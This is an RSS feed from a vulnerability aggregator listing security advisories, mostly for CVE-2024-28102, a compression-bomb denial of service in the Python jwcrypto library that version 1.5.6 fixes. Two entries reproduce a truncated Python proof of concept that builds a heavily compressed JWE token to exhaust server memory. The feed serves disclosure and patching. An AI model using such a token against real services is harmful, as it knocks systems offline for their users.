<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 09:59:25 +0000</lastBuildDate>
    <item>
      <title>ALSA-2024:2559 — Moderate: python-jwcrypto security update</title>
      <link>https://cve.radiocsirt.org/vuln/alsa-2024:2559</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; AlmaLinux:9: python3-jwcrypto&lt;/p&gt;
&lt;p&gt;The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.&lt;/p&gt;
&lt;p&gt;Security Fix(es):&lt;/p&gt;
&lt;p&gt;* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)&lt;/p&gt;
&lt;p&gt;For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; AlmaLinux:9: python3-jwcrypto&lt;/p&gt;
&lt;p&gt;The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.&lt;/p&gt;
&lt;p&gt;Security Fix(es):&lt;/p&gt;
&lt;p&gt;* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)&lt;/p&gt;
&lt;p&gt;For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/alsa-2024:2559</guid>
    </item>
    <item>
      <title>bdu:2024-01978</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2024-01978</link>
      <description>bdu:2024-01978</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2024-01978</guid>
    </item>
    <item>
      <title>certfr-2024-avi-0366 — De multiples vulnérabilités ont été découvertes dans &lt;span
class="textit"&gt;les produits IBM&lt;/span&gt;. Certaines d'entre el…</title>
      <link>https://cve.radiocsirt.org/vuln/certfr-2024-avi-0366</link>
      <description>certfr-2024-avi-0366</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/certfr-2024-avi-0366</guid>
    </item>
    <item>
      <title>EUVD-2026-162056</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-162056</link>
      <description>EUVD-2026-162056</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-162056</guid>
    </item>
    <item>
      <title>fkie_cve-2024-28102</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-28102</link>
      <description>&lt;p&gt;JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-28102</guid>
    </item>
    <item>
      <title>GHSA-j857-7rvv-vj97 — JWCrypto vulnerable to JWT bomb Attack in `deserialize` function</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-j857-7rvv-vj97</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: jwcrypto&lt;/p&gt;
&lt;p&gt;## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5&lt;/p&gt;
&lt;p&gt;## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.&lt;/p&gt;
&lt;p&gt;## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty=&amp;#39;RSA&amp;#39;, size=2048)
public_key.import_key(**json_decode(private_key.export_public()))&lt;/p&gt;
&lt;p&gt;payload = &amp;#39;{&amp;#34;u&amp;#34;: &amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000000 + &amp;#39;&amp;#34;, &amp;#34;uu&amp;#34;:&amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000000 + &amp;#39;&amp;#34;}&amp;#39;
protected_header = {
    &amp;#34;alg&amp;#34;: &amp;#34;RSA-OAEP-256&amp;#34;,
    &amp;#34;enc&amp;#34;: &amp;#34;A256CBC-HS512&amp;#34;,
    &amp;#34;typ&amp;#34;: &amp;#34;JWE&amp;#34;,
    &amp;#34;zip&amp;#34;: &amp;#34;DEF&amp;#34;,
    &amp;#34;kid&amp;#34;: public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode(&amp;#39;utf-8&amp;#39;),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;-----uncompress-----&amp;#34;)&lt;/p&gt;
&lt;p&gt;print(len(enc))&lt;/p&gt;
&lt;p&gt;begin = time.time()&lt;/p&gt;
&lt;p&gt;jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)&lt;/p&gt;
&lt;p&gt;print(time.time() - begin)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;-----compress-----&amp;#34;)&lt;/p&gt;
&lt;p&gt;payload = &amp;#39;{&amp;#34;u&amp;#34;: &amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000 + &amp;#39;&amp;#34;, &amp;#34;uu&amp;#34;:&amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000 + &amp;#39;&amp;#34;}&amp;#39;
protected_header = {
    &amp;#34;alg&amp;#34;: &amp;#34;RSA-OAEP-256&amp;#34;,
    &amp;#34;enc&amp;#34;: &amp;#34;A256CBC-HS512&amp;#34;,
    &amp;#34;typ&amp;#34;: &amp;#34;JWE&amp;#34;,
    &amp;#34;kid&amp;#34;: public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode(&amp;#39;utf-8&amp;#39;),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(com…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: jwcrypto&lt;/p&gt;
&lt;p&gt;## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5&lt;/p&gt;
&lt;p&gt;## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.&lt;/p&gt;
&lt;p&gt;## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty=&amp;#39;RSA&amp;#39;, size=2048)
public_key.import_key(**json_decode(private_key.export_public()))&lt;/p&gt;
&lt;p&gt;payload = &amp;#39;{&amp;#34;u&amp;#34;: &amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000000 + &amp;#39;&amp;#34;, &amp;#34;uu&amp;#34;:&amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000000 + &amp;#39;&amp;#34;}&amp;#39;
protected_header = {
    &amp;#34;alg&amp;#34;: &amp;#34;RSA-OAEP-256&amp;#34;,
    &amp;#34;enc&amp;#34;: &amp;#34;A256CBC-HS512&amp;#34;,
    &amp;#34;typ&amp;#34;: &amp;#34;JWE&amp;#34;,
    &amp;#34;zip&amp;#34;: &amp;#34;DEF&amp;#34;,
    &amp;#34;kid&amp;#34;: public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode(&amp;#39;utf-8&amp;#39;),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;-----uncompress-----&amp;#34;)&lt;/p&gt;
&lt;p&gt;print(len(enc))&lt;/p&gt;
&lt;p&gt;begin = time.time()&lt;/p&gt;
&lt;p&gt;jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)&lt;/p&gt;
&lt;p&gt;print(time.time() - begin)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;-----compress-----&amp;#34;)&lt;/p&gt;
&lt;p&gt;payload = &amp;#39;{&amp;#34;u&amp;#34;: &amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000 + &amp;#39;&amp;#34;, &amp;#34;uu&amp;#34;:&amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000 + &amp;#39;&amp;#34;}&amp;#39;
protected_header = {
    &amp;#34;alg&amp;#34;: &amp;#34;RSA-OAEP-256&amp;#34;,
    &amp;#34;enc&amp;#34;: &amp;#34;A256CBC-HS512&amp;#34;,
    &amp;#34;typ&amp;#34;: &amp;#34;JWE&amp;#34;,
    &amp;#34;kid&amp;#34;: public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode(&amp;#39;utf-8&amp;#39;),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(com…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-j857-7rvv-vj97</guid>
    </item>
    <item>
      <title>gsd-2024-28102</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2024-28102</link>
      <description>gsd-2024-28102</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2024-28102</guid>
    </item>
    <item>
      <title>OESA-2024-2443 — python-jwcrypto security update</title>
      <link>https://cve.radiocsirt.org/vuln/oesa-2024-2443</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; openEuler:22.03-LTS-SP1: python-jwcrypto&lt;/p&gt;
&lt;p&gt;Implements JWK, JWS, JWE specifications with python-cryptography&#13;
&#13;
Security Fix(es):&#13;
&#13;
VUL-0: CVE-2022-3102: python-jwcrypto: jwcrypto token substitution can lead to authentication bypass(CVE-2022-3102)&#13;
&#13;
JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.(CVE-2024-28102)&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; openEuler:22.03-LTS-SP1: python-jwcrypto&lt;/p&gt;
&lt;p&gt;Implements JWK, JWS, JWE specifications with python-cryptography&#13;
&#13;
Security Fix(es):&#13;
&#13;
VUL-0: CVE-2022-3102: python-jwcrypto: jwcrypto token substitution can lead to authentication bypass(CVE-2022-3102)&#13;
&#13;
JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.(CVE-2024-28102)&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/oesa-2024-2443</guid>
    </item>
    <item>
      <title>openSUSE-SU-2024:13798-1 — python310-jwcrypto-1.5.6-2.1 on GA media</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2024:13798-1</link>
      <description>&lt;p&gt;python310-jwcrypto-1.5.6-2.1 on GA media&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;python310-jwcrypto-1.5.6-2.1 on GA media&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2024:13798-1</guid>
    </item>
    <item>
      <title>PYSEC-2026-1484 — JWCrypto vulnerable to JWT bomb Attack in `deserialize` function</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2026-1484</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: jwcrypto&lt;/p&gt;
&lt;p&gt;## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5&lt;/p&gt;
&lt;p&gt;## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.&lt;/p&gt;
&lt;p&gt;## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty=&amp;#39;RSA&amp;#39;, size=2048)
public_key.import_key(**json_decode(private_key.export_public()))&lt;/p&gt;
&lt;p&gt;payload = &amp;#39;{&amp;#34;u&amp;#34;: &amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000000 + &amp;#39;&amp;#34;, &amp;#34;uu&amp;#34;:&amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000000 + &amp;#39;&amp;#34;}&amp;#39;
protected_header = {
    &amp;#34;alg&amp;#34;: &amp;#34;RSA-OAEP-256&amp;#34;,
    &amp;#34;enc&amp;#34;: &amp;#34;A256CBC-HS512&amp;#34;,
    &amp;#34;typ&amp;#34;: &amp;#34;JWE&amp;#34;,
    &amp;#34;zip&amp;#34;: &amp;#34;DEF&amp;#34;,
    &amp;#34;kid&amp;#34;: public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode(&amp;#39;utf-8&amp;#39;),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;-----uncompress-----&amp;#34;)&lt;/p&gt;
&lt;p&gt;print(len(enc))&lt;/p&gt;
&lt;p&gt;begin = time.time()&lt;/p&gt;
&lt;p&gt;jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)&lt;/p&gt;
&lt;p&gt;print(time.time() - begin)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;-----compress-----&amp;#34;)&lt;/p&gt;
&lt;p&gt;payload = &amp;#39;{&amp;#34;u&amp;#34;: &amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000 + &amp;#39;&amp;#34;, &amp;#34;uu&amp;#34;:&amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000 + &amp;#39;&amp;#34;}&amp;#39;
protected_header = {
    &amp;#34;alg&amp;#34;: &amp;#34;RSA-OAEP-256&amp;#34;,
    &amp;#34;enc&amp;#34;: &amp;#34;A256CBC-HS512&amp;#34;,
    &amp;#34;typ&amp;#34;: &amp;#34;JWE&amp;#34;,
    &amp;#34;kid&amp;#34;: public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode(&amp;#39;utf-8&amp;#39;),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(com…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: jwcrypto&lt;/p&gt;
&lt;p&gt;## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5&lt;/p&gt;
&lt;p&gt;## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.&lt;/p&gt;
&lt;p&gt;## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty=&amp;#39;RSA&amp;#39;, size=2048)
public_key.import_key(**json_decode(private_key.export_public()))&lt;/p&gt;
&lt;p&gt;payload = &amp;#39;{&amp;#34;u&amp;#34;: &amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000000 + &amp;#39;&amp;#34;, &amp;#34;uu&amp;#34;:&amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000000 + &amp;#39;&amp;#34;}&amp;#39;
protected_header = {
    &amp;#34;alg&amp;#34;: &amp;#34;RSA-OAEP-256&amp;#34;,
    &amp;#34;enc&amp;#34;: &amp;#34;A256CBC-HS512&amp;#34;,
    &amp;#34;typ&amp;#34;: &amp;#34;JWE&amp;#34;,
    &amp;#34;zip&amp;#34;: &amp;#34;DEF&amp;#34;,
    &amp;#34;kid&amp;#34;: public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode(&amp;#39;utf-8&amp;#39;),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;-----uncompress-----&amp;#34;)&lt;/p&gt;
&lt;p&gt;print(len(enc))&lt;/p&gt;
&lt;p&gt;begin = time.time()&lt;/p&gt;
&lt;p&gt;jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)&lt;/p&gt;
&lt;p&gt;print(time.time() - begin)&lt;/p&gt;
&lt;p&gt;print(&amp;#34;-----compress-----&amp;#34;)&lt;/p&gt;
&lt;p&gt;payload = &amp;#39;{&amp;#34;u&amp;#34;: &amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000 + &amp;#39;&amp;#34;, &amp;#34;uu&amp;#34;:&amp;#34;&amp;#39; + &amp;#34;u&amp;#34; * 400000 + &amp;#39;&amp;#34;}&amp;#39;
protected_header = {
    &amp;#34;alg&amp;#34;: &amp;#34;RSA-OAEP-256&amp;#34;,
    &amp;#34;enc&amp;#34;: &amp;#34;A256CBC-HS512&amp;#34;,
    &amp;#34;typ&amp;#34;: &amp;#34;JWE&amp;#34;,
    &amp;#34;kid&amp;#34;: public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode(&amp;#39;utf-8&amp;#39;),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(com…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2026-1484</guid>
    </item>
    <item>
      <title>RHSA-2024:3267 — Red Hat Security Advisory: idm:DL1 and idm:client security update</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2024:3267</link>
      <description>&lt;p&gt;JWCrypto: denail of service  Via specifically crafted JWE python-jwcrypto: malicious JWE token can cause denial of service&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;JWCrypto: denail of service  Via specifically crafted JWE python-jwcrypto: malicious JWE token can cause denial of service&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2024:3267</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2024-28102</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2024-28102</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:16.04:LTS: python-jwcrypto, Ubuntu:18.04:LTS: python-jwcrypto, Ubuntu:20.04:LTS: python-jwcrypto, Ubuntu:22.04:LTS: python-jwcrypto, Ubuntu:24.04:LTS: python-jwcrypto, Ubuntu:25.10: python-jwcrypto, Ubuntu:26.04:LTS: python-jwcrypto&lt;/p&gt;
&lt;p&gt;JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:16.04:LTS: python-jwcrypto, Ubuntu:18.04:LTS: python-jwcrypto, Ubuntu:20.04:LTS: python-jwcrypto, Ubuntu:22.04:LTS: python-jwcrypto, Ubuntu:24.04:LTS: python-jwcrypto, Ubuntu:25.10: python-jwcrypto, Ubuntu:26.04:LTS: python-jwcrypto&lt;/p&gt;
&lt;p&gt;JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2024-28102</guid>
    </item>
    <item>
      <title>WID-SEC-W-2024-1003 — Red Hat Enterprise Linux: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2024-1003</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux ausnutzen, um einen Denial-of-Service-Zustand herbeizuführen, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, Cross-Site Scripting (XSS)-Angriffe durchzuführen oder einen Men-in-the-Middle-Angriff auszuführen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux ausnutzen, um einen Denial-of-Service-Zustand herbeizuführen, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, Cross-Site Scripting (XSS)-Angriffe durchzuführen oder einen Men-in-the-Middle-Angriff auszuführen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2024-1003</guid>
    </item>
  </channel>
</rss>
